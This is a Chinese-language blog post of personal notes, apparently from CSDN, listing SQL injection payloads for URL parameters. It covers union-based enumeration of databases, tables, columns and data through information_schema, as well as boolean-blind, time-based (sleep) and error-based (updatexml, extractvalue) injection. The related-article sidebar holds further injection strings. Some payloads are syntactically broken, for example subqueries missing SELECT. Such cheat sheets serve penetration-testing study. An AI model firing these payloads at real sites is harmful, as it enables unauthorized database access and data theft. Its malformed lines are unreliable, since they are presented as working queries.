SQL注入常用语句

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量318 收藏 3
点赞数 1
分类专栏: 笔记 文章标签: sql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53498616/article/details/112963302
版权 
数字型注入:
查询数据库版本:
?id=-1 union select 1,2,(select version())
查询数据库:
?id=-1 union select 1,2,(schema_name from information_schema.schemata limit 0,1)
查询表名:
?id=-1 union select 1,2,(table_name from information_schema.tables where table_schema='库名' limit 0,1)
查询字段名:
?id=-1 union select 1,2,(column_name from information_schema.columns where table_schema='库名' and table_name='表名' limit 0,1)
查询字段内容:
?id=-1 union select 1,2,(字段名 from 表名 limit 0,1)

字符型注入:
?id=-1' union select 1,2,(select database()) #
?id=-1' union select 1,2,(select database()) --+
?id=-1' union select 1,2,(select database()) -- a(任意字符)

布尔盲注:
length()函数:返回字符串的长度
?id=1 and length(database())>1
?id=-1 or length(database())>1
substr()函数:截取字符串,从第2位开始截取1位
?id=1 and substr(database(),2,1)>'k'
left()函数:截取字符串,从左开始截取2位
?id=1 and left(database(),2)>'kk'
ascii()/ord()函数:返回字符的ascii码
?id=1 and ascii(substr(database(),1,1))>107

延时盲注:
如果if判断正确会马上执行,如果错误则会延时5秒后执行
?id=1 and if(length(database())>1,1,sleep(5))

报错注入:
?id=1 and select updatexml(1,concat(0x7e,(select database())),1)
?id=1 and select extractvalue(1,concat(0x7e,(select database())))
?id=-1 union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a

常用函数:
concat()函数:将几个字符串拼接起来,形成一个新的长字符串
concat(0x7e,username,0x7e,password)
concat_ws()函数:concat()函数的简化版,只写一个0x7e即可(注:0x7e是十六进制的分隔符~)
concat_ws(0x7e,username,password)
group_concat()函数:将对应字段的所有结果都查找并全部返回到一条记录中
group_concat(password)
Ryuuz4k1
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常用SQL注入语句
chengjingdeni的专栏
08-07 508
<br />     在对web应用进行渗透测试时,SQL注入无疑是最重要的检测项之一,下面就对常用SQL注入语句进行一个归纳总结,便于在进行渗透<br />测试时使用。<br />1.判断有无注入点<br />; and 1=1 and 1=2<br /><br />2.猜表一般的表的名称无非是admin adminuser user pass password 等..<br />and 0<>(select count(*) from *)<br />and 0<>(select count(*) f
常用Sql注入语句.
03-30
NULL 博文链接:https://cn-wangwei.iteye.com/blog/1327507
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1376
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
SQL 注入有常用语句
weixin_34234721的博客
01-14 131
是否支持多句查询http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int-- 是否支持子查询http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])&gt;=0 返回用户名http://www.xxx.com/xxx...
sql注入常用语句
EddieLancy的专栏
11-20 716
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(sele
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入fuzz字典
02-28
sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。
手工SQL注入常用SQL语句
06-05
### 手工SQL注入常用SQL语句 #### 知识点概述 在现代网络环境中,随着业务系统的复杂度增加和技术的不断进步,安全问题日益受到重视。其中,SQL注入是一种常见的攻击方式,它通过将恶意SQL代码插入到应用程序的...
sql注入常用命令
09-18
### SQL注入常用命令详解 #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来控制数据库执行非授权操作。为了帮助初学者更好地理解和掌握SQL注入的基本原理及...
常用Sql注入语句 常用Sql注入语句
09-28
常用Sql注入语句 常用Sql注入语句 常用Sql注入语句
sql注入--基本注入语句学习笔记
热门推荐
超人学飞的日子
05-31 1万+
接触到sql注入知识,做了一些常识,这里做一个完整的记录。一,联合查询联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。二,注释语句sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。1,#注释符此时后面的limit 0,30并没有生效。2,--空格注释符 注意在--后面有个空格,否则会报错,不...
sql注入常用命令
weixin_34050519的博客
12-20 609
1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 'and [查询条件] an...
常用SQL注入语句
孤的博客
10-11 2315
SQL是一种组织、管理和检索计算机数据库村粗数据的工具,它是一种计算机语言。 每天SQL语句均由一个谓词开始,该谓词描述这条语句要产生的动作,列如SELECT或UPDATE关键字。谓词后紧接一条或多天子句,子句中给出了被谓词作用的数据或提供谓词动作的详细信息。每条子句由一个关键字开始,SELECT谓词后为FROM关键字。 局部变量(Local Variable)和全局变量(Global Varia...
手工sql注入常用sql语句
05-10
以下是一些常用的手工SQL注入语句: 1. 获取当前数据库的名称: ``` SELECT database(); ``` 2. 获取当前用户: ``` SELECT user(); ``` 3. 获取当前版本号: ``` SELECT version(); ``` 4. 获取所有数据库的名称: ``` SELECT schema_name FROM information_schema.schemata; ``` 5. 获取当前数据库中所有表的名称: ``` SELECT table_name FROM information_schema.tables WHERE table_schema = database(); ``` 6. 获取当前表的列信息: ``` SELECT column_name, data_type FROM information_schema.columns WHERE table_name = '表名'; ``` 7. 获取当前表的数据: ``` SELECT * FROM 表名; ``` 8. 获取当前表中第一行数据: ``` SELECT * FROM 表名 LIMIT 1; ``` 9. 获取当前表中前n行数据: ``` SELECT * FROM 表名 LIMIT n; ``` 10. 插入一条数据: ``` INSERT INTO 表名 (列1, 列2, 列3) VALUES ('值1', '值2', '值3'); ``` 以上仅为一些常用的手工SQL注入语句,具体使用时需要根据实际情况进行调整。同时,需要注意的是,手工SQL注入可能会对数据库造成损害,使用时需要谨慎。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值